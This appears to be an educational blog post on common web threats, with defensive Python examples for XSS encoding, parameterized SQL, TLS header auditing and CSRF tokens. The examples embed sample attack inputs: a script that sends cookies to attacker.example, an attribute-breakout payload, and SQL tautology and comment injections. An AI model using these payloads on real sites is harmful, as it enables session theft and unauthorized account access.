
With the advent of the internet and its greatly expanded accessibility and connectivity, cyber security has been confronted with new challenges. Security used to be tackled with a layered approach built around a well-defined perimeter. Those layers have since become so blurred and stretched that, for practical purposes, they no longer exist.

Web security is moving outwards, from the browser to web servers and web API-based applications – and back again. The result is a universe of freely moving data that requires a multitude of controls to protect this data, the systems and also the people.

Websites and browsers can be like open doors for cybercriminals who exploit software vulnerabilities to inject malicious code or shut down websites. In this post, we’ll cover some of the common threats to our web health, as well as the consequences and remedies for each.

Software vulnerabilities

Building websites and the advanced web services needed to connect across the internet requires software, and the code of that software may contain vulnerabilities that attackers exploit. In addition, the proliferation of content management systems such as WordPress and Joomla, together with the ecosystem of modules, plugins and themes around them, has created new entry points that affect web security.

One of the most common types of attack is cross-site scripting, also known as an XSS attack. XSS is a form of injection attack: the attacker gets a piece of JavaScript into a page served by a legitimate web application, typically through user input (a comment, a search term, a profile field) that the application echoes back into its HTML without encoding it. The browser of every user who views that page then executes the script with the privileges of the trusted site. CMS community code, plugins in particular, is a notorious vector for XSS. A successful XSS attack can compromise a user's account on a website by stealing the session cookie or by driving the user's session from within their own browser. Jetpack, one of the most popular WordPress plugins, had an XSS vulnerability that affected millions of users.

Software vulnerabilities can be found in pretty much any software code, but certain practices minimize their impact. Good secure coding practices, above all context-aware output encoding of anything that came from a user, eliminate many potential vulnerabilities. The Open Web Application Security Project (OWASP) offers an excellent guide on this topic. Another way to reduce the risk of XSS is to use a Web Application Firewall (WAF); it blocks many known payloads but is a supplementary control, not a replacement for correct encoding in the application. In addition, it is fundamental for a secure web that new software patches are installed promptly.
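The following added example (not code from the original post or from any CMS or plugin mentioned above) shows the defect behind a typical reflected or stored XSS and its fix. Two constructed payloads are rendered into two page fragments, first by string interpolation and then with HTML encoding; the attribute case shows why encoding must match the context the value lands in. The payloads, template strings and helper names are assumptions made for the illustration.

```python
import html
import re

# Constructed sample inputs (not from any real site): the first is the classic
# cookie-stealing payload, the second breaks out of a quoted HTML attribute.
STORED_COMMENT_PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
ATTRIBUTE_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'


def render_comment_vulnerable(comment: str) -> str:
    """Interpolates the stored comment straight into the page. Any HTML in it,
    including <script>, is parsed and executed by every visitor's browser."""
    return '<div class="comment">' + comment + '</div>'


def render_comment_hardened(comment: str) -> str:
    """Same template, but the comment is HTML-encoded for element content:
    < > & " ' become entities, so the browser shows the text and runs nothing."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'


def render_search_box_vulnerable(last_query: str) -> str:
    """Echoes the previous search term into a value attribute without encoding.
    A quote in the input closes the attribute and lets the attacker add a handler."""
    return '<input type="text" name="q" value="' + last_query + '">'


def render_search_box_hardened(last_query: str) -> str:
    """Attribute context: the attribute is quoted AND the value is encoded, so the
    closing quote in the payload arrives as &quot; and cannot end the attribute."""
    return '<input type="text" name="q" value="' + html.escape(last_query, quote=True) + '">'


def count_event_handlers(markup: str) -> int:
    """Demo helper: counts attributes of the form on...=" in the markup.
    Correctly encoded user input never produces a new handler attribute."""
    return len(re.findall(r'\son[a-z]+="', markup))


if __name__ == "__main__":
    print(render_comment_vulnerable(STORED_COMMENT_PAYLOAD))   # script tag intact
    print(render_comment_hardened(STORED_COMMENT_PAYLOAD))     # &lt;script&gt;...
    print(count_event_handlers(render_search_box_vulnerable(ATTRIBUTE_PAYLOAD)))  # 1
    print(count_event_handlers(render_search_box_hardened(ATTRIBUTE_PAYLOAD)))    # 0
```

`html.escape` covers element content and quoted attributes only; a value written into a JavaScript string, a URL or a CSS block needs the encoder for that context, which is why templating engines with automatic, context-aware escaping are preferable to hand-built strings like these.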

Database injection attack

Data drives the internet, and it is also where the greatest risk lies, since cybercriminals increasingly target Personally Identifiable Information (PII). The numbers illustrate this: in 2014, the US saw a record number of confidential data breaches, a 27.5% increase over 2013.

Cybercriminals look at all aspects of web security to gain access. One way is through the databases that store data and login credentials for user accounts. Databases are a fundamental technology for the Internet. Everything is stored in them in one form or another.

The risk of injection exists regardless of whether a SQL database (e.g. MS SQL) or a NoSQL store (e.g. MongoDB) is used. Injection occurs when user input is placed into a query without being kept apart from the query's own syntax: a poorly handled form field lets an attacker append their own commands to the statement the application runs against the database, and the database then returns, or changes, whatever the attacker asked for rather than what the developer intended. The remedy is parameterized queries (prepared statements), which pass data separately from the SQL text, combined with validation of the input; a WAF in front of the application can add a further layer.
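As an added example (not code from the original post), the login query below is built once by string concatenation and once with bound parameters, against a constructed in-memory SQLite table. The two attacker inputs are the standard tautology and comment-sequence payloads; the table, the sample rows and the function names are assumptions for the illustration, and the password column holds placeholder hashes rather than real credentials.

```python
import sqlite3
from typing import List


def make_sample_db() -> sqlite3.Connection:
    """In-memory user table with constructed sample rows (no real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash) VALUES (?, ?)",
        [("alice", "hash_of_alice_pw"), ("bob", "hash_of_bob_pw")],
    )
    conn.commit()
    return conn


def build_login_sql_vulnerable(username: str, password_hash: str) -> str:
    """String concatenation: the form values become part of the SQL text, so a
    quote in the input ends the literal and whatever follows is parsed as SQL."""
    return (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password_hash = '" + password_hash + "' ORDER BY id"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> List[str]:
    """Runs the concatenated statement and returns the matching usernames."""
    return [row[0] for row in conn.execute(build_login_sql_vulnerable(username, password_hash))]


def login_parameterized(conn: sqlite3.Connection, username: str, password_hash: str) -> List[str]:
    """Bound parameters: the SQL text is fixed and the driver hands the values
    over separately, so they are compared as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (username, password_hash))]


if __name__ == "__main__":
    db = make_sample_db()
    # Constructed attacker inputs: a tautology in the password field, and a
    # comment sequence in the username field that discards the password check.
    print(build_login_sql_vulnerable("alice", "' OR '1'='1"))
    print(login_vulnerable(db, "alice", "' OR '1'='1"))          # ['alice', 'bob']
    print(login_vulnerable(db, "alice' --", "wrong"))             # ['alice']
    print(login_parameterized(db, "alice", "' OR '1'='1"))       # []
    print(login_parameterized(db, "alice' --", "wrong"))          # []
    print(login_parameterized(db, "alice", "hash_of_alice_pw"))  # ['alice']
```

The same mistake exists for NoSQL stores when a request body is passed into a query object unchanged, for example a JSON value that turns a string comparison into an operator expression; the fix is the same in spirit: build the query from typed values the application controls, not from raw input.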

Database Exploitation

The storage of data in the web context is another area that can be misconfigured to the detriment of user data. PCI compliance, for example, was developed to counter threats to stored payment card information. Nevertheless, this was not enough in the case of JPMorgan Chase: in 2014, 83 million customer accounts were exposed without protection. Inadequately implemented server authentication also played a role here (see also Web Access Controls and the human factor). The PCI Security Standards Council now also recommends the use of a WAF to better protect web applications against such attacks. Database security is a topic in its own right, but the discussion also covers strong two-factor or multi-factor authentication for database and administrative access and a proper understanding of what database encryption does and does not protect against.

Insufficiently implemented SSL/TLS

Most websites that handle sensitive data (such as login credentials or personal data) are configured to use Transport Layer Security (TLS), the successor to the Secure Sockets Layer (SSL) protocol; the older name is still in common use. This establishes an HTTPS connection that encrypts the traffic between browser and server. The problem is that the protocol can be deployed incorrectly, and such deployments are then attacked with little effort. A classic example is a login page delivered over plain HTTP, with only the form target using HTTPS; closely related are session cookies set without the Secure flag, which the browser therefore also sends over HTTP, and a missing HTTP Strict Transport Security (HSTS) header, which leaves the first request open to a downgrade. Cheap Wi-Fi attack hardware exists: a device such as the Wi-Fi Pineapple (itself a legitimate pen-testing tool) can act as a rogue access point and, against a poorly configured site, intercept user credentials and take over user accounts.
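The added example below (my own illustration, not from the original post and not a real scanner) audits the transport-related parts of a login response for exactly the misconfigurations described above: plain HTTP, no or short HSTS, and a session cookie without Secure or HttpOnly. The two responses are constructed, the header values are illustrative, and the six-month HSTS baseline is an assumed threshold.

```python
import re
from typing import Dict, List

# Constructed responses for a hypothetical login page; the header values are
# illustrative, not captured from any real site.
WEAK_LOGIN = {
    "scheme": "http",
    "headers": {
        "Content-Type": "text/html",
        "Set-Cookie": "session=3f9a77c1; Path=/",
    },
}
HARDENED_LOGIN = {
    "scheme": "https",
    "headers": {
        "Content-Type": "text/html",
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
        "Set-Cookie": "session=3f9a77c1; Path=/; Secure; HttpOnly; SameSite=Lax",
    },
}

MIN_HSTS_MAX_AGE = 180 * 24 * 3600  # six months, an assumed baseline for this audit


def cookie_attributes(set_cookie: str) -> set:
    """Lower-cased attribute names that follow the name=value pair of a Set-Cookie."""
    return {part.strip().split("=", 1)[0].lower() for part in set_cookie.split(";")[1:]}


def audit_login_transport(scheme: str, headers: Dict[str, str]) -> List[str]:
    """Returns the findings that let a rogue access point (the Wi-Fi Pineapple
    scenario) read the credentials or the session cookie in the clear."""
    findings = []
    if scheme != "https":
        findings.append("login page served over plain HTTP")
    hsts = headers.get("Strict-Transport-Security", "")
    match = re.search(r"max-age=(\d+)", hsts)
    if match is None:
        findings.append("no Strict-Transport-Security header: first visit can be downgraded")
    elif int(match.group(1)) < MIN_HSTS_MAX_AGE:
        findings.append("Strict-Transport-Security max-age shorter than six months")
    cookie = headers.get("Set-Cookie", "")
    if cookie:
        attrs = cookie_attributes(cookie)
        if "secure" not in attrs:
            findings.append("session cookie without Secure: browser also sends it over http://")
        if "httponly" not in attrs:
            findings.append("session cookie without HttpOnly: readable by injected script")
    return findings


if __name__ == "__main__":
    for name, resp in (("weak", WEAK_LOGIN), ("hardened", HARDENED_LOGIN)):
        print(name, audit_login_transport(resp["scheme"], resp["headers"]))
```

The check covers the application-level side only; cipher suites, certificate chains and protocol versions are the other half of a TLS review and need a dedicated tool.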

Cross-site request forgery

Cross-site request forgery (CSRF) is another common type of attack. Suppose a user is logged in to a legitimate site, e.g. an e-commerce site where they have an account, and in the same browser session opens a page prepared by cybercriminals. Because the browser automatically attaches the legitimate site's cookies to every request it sends there, the attacker's page can submit a hidden form POST to the backend of the application the user is logged in to, and the application sees a request that looks exactly like one the user made deliberately. The attacker can therefore trigger any action the user is allowed to perform, for example transferring money to an account they control.

Fortunately, there are ways to prevent this type of attack, in the backend or with a third-party tool such as a WAF. They include CAPTCHAs and, more commonly, hidden anti-CSRF tokens in every form that the attacker's page cannot read, supplemented in current browsers by the SameSite cookie attribute. Another important aspect is making users aware of the risk.
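The following added example (my own code, not from the original post) implements the hidden-token defence for the money-transfer scenario above: a token bound to the session by HMAC, verified in constant time, plus an Origin header check as a second layer. The site origin, session identifiers, form fields and the in-process server secret are assumptions for the illustration.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Server-side secret, generated at start-up for this example; in production it is
# a per-deployment secret loaded from configuration, not generated per process.
SERVER_SECRET = secrets.token_bytes(32)
SITE_ORIGIN = "https://shop.example"  # hypothetical origin of the legitimate site


def issue_csrf_token(session_id: str) -> str:
    """Token written into a hidden field of the real form. It is bound to the
    session by HMAC, so a token the attacker obtains in their own session is useless."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: Optional[str]) -> bool:
    """Recomputes the MAC for this session and compares in constant time."""
    if not token or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(session_id: str, headers: Dict[str, str], form: Dict[str, str]) -> str:
    """Backend handler. The session cookie (session_id) arrives with every POST
    the browser sends to this site, including one submitted by an attacker's
    page; the Origin header and the token are what distinguish the two."""
    origin = headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-site request"
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return "403 missing or invalid CSRF token"
    return f"200 transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    victim_session = "sess-victim-0001"  # constructed session identifier
    # Legitimate submission from the site's own form.
    token = issue_csrf_token(victim_session)
    print(handle_transfer(victim_session, {"Origin": SITE_ORIGIN},
                          {"to": "alice", "amount": "10", "csrf_token": token}))
    # Forged POST from https://evil.example: the browser still sends the victim's
    # cookie, but the Origin is foreign and no valid token is available.
    print(handle_transfer(victim_session, {"Origin": "https://evil.example"},
                          {"to": "attacker", "amount": "5000"}))
    # Origin absent and a token from the attacker's own session: still rejected.
    attacker_token = issue_csrf_token("sess-attacker-9999")
    print(handle_transfer(victim_session, {},
                          {"to": "attacker", "amount": "5000", "csrf_token": attacker_token}))
```

The Origin check alone is not sufficient because some clients omit the header, which is why a missing Origin is tolerated here and the token remains mandatory; SameSite=Lax on the session cookie stops the browser from attaching it to a cross-site POST in the first place and is worth setting in addition.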

Web Access Controls and the human factor

Access control for user accounts on a web application is a rapidly developing field. Password fatigue is making itself felt at the same time as cybercrime and identity theft are rising sharply.

If you analyze some of the biggest incidents of the last two years, it is noticeable that stolen credentials are frequently the first step of a cyber attack. In fact, according to several studies and the Verizon Data Breach Investigations Report, up to 80% of incidents can be attributed to stolen credentials, and they also play a major role in data breaches, including breaches of financial information. Web-based attack vectors are often used in credential theft. Due to the openness and accessibility of the Internet, the number of human points of contact has increased enormously; it almost seems as if everyone is a potential "insider threat". Social engineering itself is not new, but it has reached a new scale in recent years with the spread of phishing and spear phishing and the fake websites that go with them. Social engineering attacks are arguably among the hardest to counter, because human behavior is the weak point. Spear phishing in particular is proving especially successful: in its Spear Phishing Attacks Report (2014), the security company FireEye states that spear phishing emails had an open rate of 70% and that 50% of users clicked through to a fake website. Two-factor authentication is an effective means of mitigating the risk from stolen credentials, because a stolen password alone is then no longer enough to log in.

Malvertising

Malvertising is still a fairly new phenomenon in the field of cyber threats. Cybercriminals use online advertisements to infect the devices of those who visit the website via a browser. Malvertising is a growing threat. Google had to remove 350 million “bad ads” from the DoubleClick network last year. Many were ransomware, one of the darkest variants of malware, used to extort up to $1000 from infected users.

DoS attacks

In a Denial of Service (DoS) or Distributed Denial of Service (DDoS) attack, an attacker floods a website with requests until the service becomes unavailable. The latter, DDoS, relies on a "botnet": a network of many devices belonging to unsuspecting users on which malware has been secretly installed in advance. A "bot herder" then instructs that malware to flood a specific website and paralyze it. The method has also been used by hacktivists and by the Chinese government against the US government. It is also used as a diversionary tactic, allowing cybercriminals to smuggle malware into an organization while its staff are busy dealing with the DDoS attack.

Web security: Freedoms need to be defended…

The Internet has given us incredible freedom of communication and access to many services. With great innovations come challenges, and web security is one of them. The distributed nature of the internet also means that we need to be more innovative to protect these distributed resources. The correct implementation of web applications and their extended hosting infrastructure helps to protect stored data as well as data in transit. Furthermore, the proper use of tools such as Web Application Firewalls (WAF) helps to address the challenges posed by modern web hacking techniques, those methods that attempt to exploit the open and interconnected nature of the Internet. Developing a robust security strategy requires knowledge and insight into the truly critical aspects of web security and into how cybercriminals exploit vulnerabilities. With the correct use of implementation standards and the right tools, we can substantially reduce the risk to our websites and services and keep data protection and privacy intact.